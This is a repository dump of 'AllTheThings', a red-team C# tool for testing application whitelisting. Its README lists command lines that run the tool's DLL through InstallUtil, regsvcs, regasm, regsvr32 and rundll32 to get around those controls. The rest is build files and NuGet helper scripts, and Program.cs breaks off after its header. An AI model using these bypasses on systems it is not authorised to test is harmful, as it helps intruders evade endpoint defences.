├── AllTheThings
├── key.snk
├── bin
│ ├── Debug
│ │ ├── AllTheThings.exe
│ │ ├── AllTheThings.pdb
│ │ ├── AllTheThings.vshost.exe
│ │ ├── AllTheThings.exe.config
│ │ └── AllTheThings.vshost.exe.config
│ ├── x64
│ │ ├── Release
│ │ │ ├── AllTheThings.dll
│ │ │ ├── AllTheThings.exp
│ │ │ ├── AllTheThings.lib
│ │ │ ├── AllTheThings.vshost.exe
│ │ │ ├── AllTheThings.dll.config
│ │ │ ├── AllTheThings.vshost.exe.config
│ │ │ └── AllTheThings.vshost.exe.manifest
│ │ └── Debug
│ │ │ ├── AllTheThings.vshost.exe
│ │ │ ├── AllTheThings.exe.config
│ │ │ └── AllTheThings.vshost.exe.config
│ └── x86
│ │ ├── Release
│ │ ├── AllTheThings.exp
│ │ ├── AllTheThings.lib
│ │ ├── AllTheThings.vshost.exe
│ │ ├── AllTheThings.vshost.exe.config
│ │ └── AllTheThings.vshost.exe.manifest
│ │ └── Debug
│ │ ├── AllTheThings.vshost.exe
│ │ ├── AllTheThings.exe.config
│ │ └── AllTheThings.vshost.exe.config
├── obj
│ ├── Debug
│ │ ├── AllTheThings.exe
│ │ ├── AllTheThings.pdb
│ │ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ │ ├── AllTheThings.csprojResolveAssemblyReference.cache
│ │ └── AllTheThings.csproj.FileListAbsolute.txt
│ ├── x64
│ │ ├── Release
│ │ │ ├── AllTheThings.dll
│ │ │ ├── AllTheThings.pdb
│ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ │ │ └── AllTheThings.csproj.FileListAbsolute.txt
│ │ └── Debug
│ │ │ ├── AllTheThings.csproj.FileListAbsolute.txt
│ │ │ └── DesignTimeResolveAssemblyReferencesInput.cache
│ └── x86
│ │ ├── Debug
│ │ ├── AllTheThings.csproj.FileListAbsolute.txt
│ │ └── DesignTimeResolveAssemblyReferencesInput.cache
│ │ └── Release
│ │ └── DesignTimeResolveAssemblyReferencesInput.cache
├── packages.config
├── App.config
├── Properties
│ └── AssemblyInfo.cs
├── Program.cs
└── AllTheThings.csproj
├── AllTheThingsBinary.zip
├── packages
└── UnmanagedExports.1.2.7
│ ├── tools
│ ├── Mono.Cecil.dll
│ ├── RGiesecke.DllExport.dll
│ ├── RGiesecke.DllExport.pdb
│ ├── RGiesecke.DllExport.MSBuild.dll
│ ├── RGiesecke.DllExport.MSBuild.pdb
│ ├── init.ps1
│ ├── uninstall.ps1
│ ├── install.ps1
│ ├── DllExportCmdLets.psm1
│ └── RGiesecke.DllExport.targets
│ ├── UnmanagedExports.1.2.7.nupkg
│ └── lib
│ └── net
│ └── RGiesecke.DllExport.Metadata.dll
├── README.md
├── LICENSE
├── AllTheThings.sln
├── JsDelivery.js
└── JSDelivery.sct
/AllTheThings/key.snk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/key.snk
--------------------------------------------------------------------------------
/AllTheThingsBinary.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThingsBinary.zip
--------------------------------------------------------------------------------
/AllTheThings/bin/Debug/AllTheThings.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/Debug/AllTheThings.exe
--------------------------------------------------------------------------------
/AllTheThings/bin/Debug/AllTheThings.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/Debug/AllTheThings.pdb
--------------------------------------------------------------------------------
/AllTheThings/obj/Debug/AllTheThings.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/Debug/AllTheThings.exe
--------------------------------------------------------------------------------
/AllTheThings/obj/Debug/AllTheThings.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/Debug/AllTheThings.pdb
--------------------------------------------------------------------------------
/AllTheThings/bin/Debug/AllTheThings.vshost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/Debug/AllTheThings.vshost.exe
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Release/AllTheThings.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/x64/Release/AllTheThings.dll
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Release/AllTheThings.exp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/x64/Release/AllTheThings.exp
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Release/AllTheThings.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/x64/Release/AllTheThings.lib
--------------------------------------------------------------------------------
/AllTheThings/bin/x86/Release/AllTheThings.exp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/x86/Release/AllTheThings.exp
--------------------------------------------------------------------------------
/AllTheThings/bin/x86/Release/AllTheThings.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/x86/Release/AllTheThings.lib
--------------------------------------------------------------------------------
/AllTheThings/obj/x64/Release/AllTheThings.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/x64/Release/AllTheThings.dll
--------------------------------------------------------------------------------
/AllTheThings/obj/x64/Release/AllTheThings.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/x64/Release/AllTheThings.pdb
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Debug/AllTheThings.vshost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/x64/Debug/AllTheThings.vshost.exe
--------------------------------------------------------------------------------
/AllTheThings/bin/x86/Debug/AllTheThings.vshost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/x86/Debug/AllTheThings.vshost.exe
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Release/AllTheThings.vshost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/x64/Release/AllTheThings.vshost.exe
--------------------------------------------------------------------------------
/AllTheThings/bin/x86/Release/AllTheThings.vshost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/bin/x86/Release/AllTheThings.vshost.exe
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/Mono.Cecil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/packages/UnmanagedExports.1.2.7/tools/Mono.Cecil.dll
--------------------------------------------------------------------------------
/AllTheThings/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/UnmanagedExports.1.2.7.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/packages/UnmanagedExports.1.2.7/UnmanagedExports.1.2.7.nupkg
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.dll
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.pdb
--------------------------------------------------------------------------------
/AllTheThings/obj/x64/Debug/AllTheThings.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\bin\x64\Debug\AllTheThings.exe.config
2 |
--------------------------------------------------------------------------------
/AllTheThings/obj/x86/Debug/AllTheThings.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\bin\x86\Debug\AllTheThings.exe.config
2 |
--------------------------------------------------------------------------------
/AllTheThings/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.dll
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.pdb
--------------------------------------------------------------------------------
/AllTheThings/obj/Debug/AllTheThings.csprojResolveAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/Debug/AllTheThings.csprojResolveAssemblyReference.cache
--------------------------------------------------------------------------------
/AllTheThings/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/AllTheThings/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/lib/net/RGiesecke.DllExport.Metadata.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/packages/UnmanagedExports.1.2.7/lib/net/RGiesecke.DllExport.Metadata.dll
--------------------------------------------------------------------------------
/AllTheThings/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/AllTheThings/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/AllTheThings/master/AllTheThings/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/AllTheThings/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AllTheThings/bin/Debug/AllTheThings.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Debug/AllTheThings.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Release/AllTheThings.dll.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AllTheThings/bin/x86/Debug/AllTheThings.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AllTheThings/bin/Debug/AllTheThings.vshost.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Debug/AllTheThings.vshost.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AllTheThings/bin/x86/Debug/AllTheThings.vshost.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Release/AllTheThings.vshost.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AllTheThings/bin/x86/Release/AllTheThings.vshost.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/init.ps1:
--------------------------------------------------------------------------------
1 | param($installPath, $toolsPath, $package, $project)
2 |
3 | Import-Module (Join-Path $toolsPath DllExportCmdLets.psm1)
4 |
5 | if($project) {
6 | Assert-PlatformTargetOfProject $project.FullName
7 | }
8 | else {
9 | Get-AllDllExportMsBuildProjects | % {
10 | Assert-PlatformTargetOfProject $_.FullPath
11 | }
12 | }
--------------------------------------------------------------------------------
/AllTheThings/bin/x64/Release/AllTheThings.vshost.exe.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/AllTheThings/bin/x86/Release/AllTheThings.vshost.exe.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/AllTheThings/obj/x64/Release/AllTheThings.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\bin\x64\Release\AllTheThings.pdb
2 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\obj\x64\Release\AllTheThings.pdb
3 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\bin\x64\Release\AllTheThings.dll.config
4 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\bin\x64\Release\AllTheThings.dll
5 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\obj\x64\Release\AllTheThings.dll
6 |
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/uninstall.ps1:
--------------------------------------------------------------------------------
1 | param($installPath, $toolsPath, $package, $project)
2 |
3 | $targetFileName = 'RGiesecke.DllExport.targets'
4 | $targetFileName = [System.IO.Path]::Combine($toolsPath, $targetFileName)
5 | $targetUri = New-Object Uri($targetFileName, [UriKind]::Absolute)
6 |
7 | $projects = Get-DllExportMsBuildProjectsByFullName($project.FullName)
8 |
9 | return $projects | % {
10 | $currentProject = $_
11 |
12 | $currentProject.Xml.Imports | ? {
13 | "RGiesecke.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project)
14 | } | % {
15 | $currentProject.Xml.RemoveChild($_)
16 | }
17 | }
--------------------------------------------------------------------------------
/AllTheThings/obj/Debug/AllTheThings.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\bin\Debug\AllTheThings.exe.config
2 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\bin\Debug\AllTheThings.exe
3 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\bin\Debug\AllTheThings.pdb
4 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\obj\Debug\AllTheThings.csprojResolveAssemblyReference.cache
5 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\obj\Debug\AllTheThings.exe
6 | c:\users\subtee\documents\visual studio 2015\Projects\AllTheThings\AllTheThings\obj\Debug\AllTheThings.pdb
7 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AllTheThings
2 |
3 | ###Includes 5 Known Application Whitelisting Bypass Techniques in One File.
4 |
5 | ###1. InstallUtil.exe
6 |
7 | ###2. Regsvcs.exe
8 |
9 | ###3. Regasm.exe
10 |
11 | ###4. regsvr32.exe
12 |
13 | ###5. rundll32.exe
14 |
15 |
16 |
17 | #Usage:
18 | ##1.
19 | x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
20 |
21 | x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
22 | ##2.
23 |
24 | x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
25 |
26 | x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
27 | ##3.
28 |
29 | x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
30 |
31 | x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
32 |
33 | ##4.
34 |
35 | regsvr32 /s /u AllTheThings.dll -->Calls DllUnregisterServer
36 |
37 | regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer
38 |
39 | ##5.
40 |
41 | rundll32 AllTheThings.dll,EntryPoint
42 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Copyright (c) 2016, Casey Smith
2 | All rights reserved.
3 |
4 | Redistribution and use in source and binary forms, with or without
5 | modification, are permitted provided that the following conditions are met:
6 |
7 | * Redistributions of source code must retain the above copyright notice, this
8 | list of conditions and the following disclaimer.
9 |
10 | * Redistributions in binary form must reproduce the above copyright notice,
11 | this list of conditions and the following disclaimer in the documentation
12 | and/or other materials provided with the distribution.
13 |
14 | * Neither the name of AllTheThings nor the names of its
15 | contributors may be used to endorse or promote products derived from
16 | this software without specific prior written permission.
17 |
18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
19 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
20 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
22 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
23 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
25 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
26 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
28 |
--------------------------------------------------------------------------------
/AllTheThings/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("AllTheThings")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("AllTheThings")]
13 | [assembly: AssemblyCopyright("Copyright © 2016")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("0547ff40-5255-42a2-beb7-2ff0dbf7d3ba")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/AllTheThings.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AllTheThings", "AllTheThings\AllTheThings.csproj", "{0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Debug|x86 = Debug|x86
13 | Release|Any CPU = Release|Any CPU
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
19 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Debug|Any CPU.Build.0 = Debug|Any CPU
20 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Debug|x64.ActiveCfg = Debug|x64
21 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Debug|x64.Build.0 = Debug|x64
22 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Debug|x86.ActiveCfg = Debug|x86
23 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Debug|x86.Build.0 = Debug|x86
24 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Release|Any CPU.ActiveCfg = Release|Any CPU
25 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Release|Any CPU.Build.0 = Release|Any CPU
26 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Release|x64.ActiveCfg = Release|x64
27 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Release|x64.Build.0 = Release|x64
28 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Release|x86.ActiveCfg = Release|x86
29 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}.Release|x86.Build.0 = Release|x86
30 | EndGlobalSection
31 | GlobalSection(SolutionProperties) = preSolution
32 | HideSolutionNode = FALSE
33 | EndGlobalSection
34 | EndGlobal
35 |
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/install.ps1:
--------------------------------------------------------------------------------
1 | param($installPath, $toolsPath, $package, $project)
2 |
3 | $targetFileName = 'RGiesecke.DllExport.targets'
4 | $targetFileName = [IO.Path]::Combine($toolsPath, $targetFileName)
5 | $targetUri = New-Object Uri -ArgumentList $targetFileName, [UriKind]::Absolute
6 |
7 | $msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
8 | $msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
9 |
10 | if(!$msBuildV4) {
11 | throw New-Object System.IO.FileNotFoundException("Could not load $msBuildV4Name.");
12 | }
13 |
14 | $projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
15 |
16 | # change the reference to RGiesecke.DllExport.Metadata.dll to not be copied locally
17 |
18 | $project.Object.References | ? {
19 | $_.Name -ieq "RGiesecke.DllExport.Metadata"
20 | } | % {
21 | if($_ | Get-Member | ? {$_.Name -eq "CopyLocal"}){
22 | $_.CopyLocal = $false
23 | }
24 | }
25 |
26 | $projects = $projectCollection::GlobalProjectCollection.GetLoadedProjects($project.FullName)
27 | $projects | % {
28 | $currentProject = $_
29 |
30 | # remove imports of RGiesecke.DllExport.targets from this project
31 | $currentProject.Xml.Imports | ? {
32 | return ("RGiesecke.DllExport.targets" -ieq [IO.Path]::GetFileName($_.Project))
33 | } | % {
34 | $currentProject.Xml.RemoveChild($_);
35 | }
36 |
37 | # remove the properties DllExportAttributeFullName and DllExportAttributeAssemblyName
38 | $currentProject.Xml.Properties | ? {
39 | $_.Name -eq "DllExportAttributeFullName" -or $_.Name -eq "DllExportAttributeAssemblyName"
40 | } | % {
41 | $_.Parent.RemoveChild($_)
42 | }
43 |
44 | $projectUri = New-Object Uri -ArgumentList $currentProject.FullPath, [UriKind]::Absolute
45 | $relativeUrl = $projectUri.MakeRelative($targetUri)
46 | $import = $currentProject.Xml.AddImport($relativeUrl)
47 | $import.Condition = "Exists('$relativeUrl')";
48 |
49 | # remove the old stuff in the DllExports folder from previous versions, (will check that only known files are in it)
50 | Remove-OldDllExportFolder $project
51 | Assert-PlatformTargetOfProject $project.FullName
52 | }
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/DllExportCmdLets.psm1:
--------------------------------------------------------------------------------
1 | function Remove-OldDllExportFolder {
2 | param($project)
3 | $defaultFiles = ('DllExportAttribute.cs',
4 | 'Mono.Cecil.dll',
5 | 'RGiesecke.DllExport.dll',
6 | 'RGiesecke.DllExport.pdb',
7 | 'RGiesecke.DllExport.MSBuild.dll',
8 | 'RGiesecke.DllExport.MSBuild.pdb',
9 | 'RGiesecke.DllExport.targets')
10 |
11 | $projectFile = New-Object 'System.IO.FileInfo'($project.FullName)
12 |
13 | $projectFile.Directory.GetDirectories("DllExport") | Select-Object -First 1 | % {
14 | $dllExportDir = $_
15 |
16 | if($dllExportDir.GetDirectories().Count -eq 0){
17 | $unknownFiles = $dllExportDir.GetFiles() | Select -ExpandProperty Name | ? { -not $defaultFiles -contains $_ }
18 |
19 | if(-not $unknownFiles){
20 | Write-Host "Removing 'DllExport' from " $project.Name
21 | $project.ProjectItems | ? { $_.Name -ieq 'DllExport' } | % {
22 | $_.Remove()
23 | }
24 |
25 | Write-Host "Deleting " $dllExportDir.FullName " ..."
26 | $dllExportDir.Delete($true)
27 | }
28 | }
29 | }
30 | }
31 |
32 | function Remove-OldDllExportFolders {
33 | Get-Project -all | % {
34 | Remove-OldDllExportFolder $_
35 | }
36 | }
37 |
38 | function Get-DllExportMsBuildProjectsByFullName([String] $fullName) {
39 | $msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
40 | $msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
41 |
42 | if(!$msBuildV4) {
43 | throw New-Object 'System.IO.FileNotFoundException'("Could not load $msBuildV4Name.")
44 | }
45 |
46 | $projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
47 |
48 | return $projectCollection::GlobalProjectCollection.GetLoadedProjects($fullName)
49 | }
50 |
51 | function Get-AllDllExportMsBuildProjects {
52 | (Get-Project -all | % {
53 | Get-DllExportMsBuildProjectsByFullName $_.FullName
54 | }) | ? {
55 | return ($_.Xml.Imports | ? {
56 | "RGiesecke.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project);
57 | }).Length -gt 0;
58 | }
59 | }
60 |
61 | function Assert-PlatformTargetOfProject([String] $fullName) {
62 | $proj = Get-DllExportMsBuildProjectsByFullName $fullName
63 |
64 | if(!$proj) {
65 | return;
66 | }
67 |
68 | $platformTarget = $proj.GetPropertyValue('PlatformTarget');
69 |
70 | if(!$platformTarget -or ($platformTarget -ine 'x86' -and $platformTarget -ine 'x64')) {
71 | $projectName = [IO.Path]::GetFileNameWithoutExtension($fullName);
72 | if(!$platformTarget) {
73 | $platformTarget = "has no platform target";
74 | } else {
75 | $platformTarget = "has a platform target of '$platformTarget'";
76 | }
77 | Write-Warning "The project '$projectName' $platformTarget. Only x86 or x64 assemblies can export functions."
78 | Write-Host ""
79 | }
80 | }
81 |
82 | function Set-NoDllExportsForAnyCpu([String] $projectName, [System.Nullable[bool]] $value) {
83 | $projects = Get-AllDllExportMsBuildProjects;
84 |
85 | [String] $asString = $value;
86 |
87 | if($projectName) {
88 | $projects = $projects | where { $_.Name -ieq $projectName };
89 | }
90 | $propertyName = 'NoDllExportsForAnyCpu';
91 |
92 | $projects = $projects | where {
93 | $_.GetPropertyValue($propertyName) -ine $asString
94 | } | % {
95 | $_.SetProperty($propertyName, $asString);
96 | }
97 | }
98 |
99 | Export-ModuleMember Set-NoDllExportsForAnyCpu
100 |
101 | Export-ModuleMember Remove-OldDllExportFolder
102 | Export-ModuleMember Remove-OldDllExportFolders
103 | Export-ModuleMember Get-DllExportMsBuildProjectsByFullName
104 | Export-ModuleMember Get-AllDllExportMsBuildProjects
105 | Export-ModuleMember Assert-PlatformTargetOfProject
--------------------------------------------------------------------------------
/AllTheThings/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Reflection;
4 | using System.Configuration.Install;
5 | using System.Runtime.InteropServices;
6 | using System.EnterpriseServices;
7 | using RGiesecke.DllExport;
8 |
9 |
10 |
11 | /*
12 | Author: Casey Smith, Twitter: @subTee
13 | License: BSD 3-Clause
14 |
15 | For Testing Binary Application Whitelisting Controls
16 |
